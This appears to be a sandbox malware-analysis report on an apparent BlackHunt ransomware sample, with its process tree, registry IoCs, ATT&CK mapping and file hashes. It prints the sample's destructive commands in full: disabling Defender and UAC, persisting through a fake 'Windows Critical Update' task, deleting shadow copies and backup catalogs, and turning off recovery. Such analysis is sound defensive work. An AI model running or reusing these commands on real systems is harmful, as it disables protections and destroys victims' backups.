53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 141 PID 4532 wrote to memory of 1864 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 141 PID 4532 wrote to memory of 1876 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 145 PID 4532 wrote to memory of 1876 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 145 PID 4532 wrote to memory of 1332 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 148 PID 4532 wrote to memory of 1332 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 148 PID 4532 wrote to memory of 2420 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 149 PID 4532 wrote to memory of 2420 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 149 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe"C:\Users\Admin\AppData\Local\Temp\53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:1392
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3788
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:4844
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3128
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1868
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3532
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:5080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1356
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1476
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1412
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2572
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1100
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1876
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1332
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4748
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2216
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe" /F2⤵PID:4180
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe" /F3⤵
- Creates scheduled task(s)
PID:1312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3288
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4564
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4516
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4632
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3120
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:664
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2444
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2748
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5080
-
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3832
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1592
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3064
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:552
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4692
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4340
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55771a893dfd2488d20726613786d387d
SHA1b8f223ef11ffb6e7400029e5617d229d99d9c029
SHA256f547815237fe24d0b86ed682ed3ff8e5a2e049d31087ed995cd18e6b093df93a
SHA5129132899f4717cc41b742902620571a75124ec6c3e9e53364d972bd0b03e625c4db65abe7a0506cbac08014a4f6232fa912d9fef987ba2bc6560ef386f23bb18c
-
Filesize
12KB
MD50176046344c564de886b493418d20d15
SHA18e32a9a93a4516547151a05e2aadbc892f9ff56d
SHA256f65e8d2628aa8b4152c449560ff938fd03a57476e9156d2034144a48d68a1eba
SHA5123f438d008146e725f3647d55abc6ffb78a832e7c9cf994c1d67400730abe29fb95e3e4f1d36c47e9c7b04fa74f81635161b233ec2296d149d9a167ea3e157cc1
-
Filesize
684B
MD556fb57f507edbe07fdba81259ad532d0
SHA1723cf8f6edaed19fcdf6a11e5a7bc34b9237f7d9
SHA25691ce9cec266bbd131c2155e887b4b28ee3c99fc0938834dd108f45d3aaa04d11
SHA51267ec0ed018a1c2ad19bbb58361372ff56035a272f1e4b25321bde90806a2b426d2bc2dcfbbe6e13953be65621c1ad293cd8d6d6ccd3b96fe332c825663501387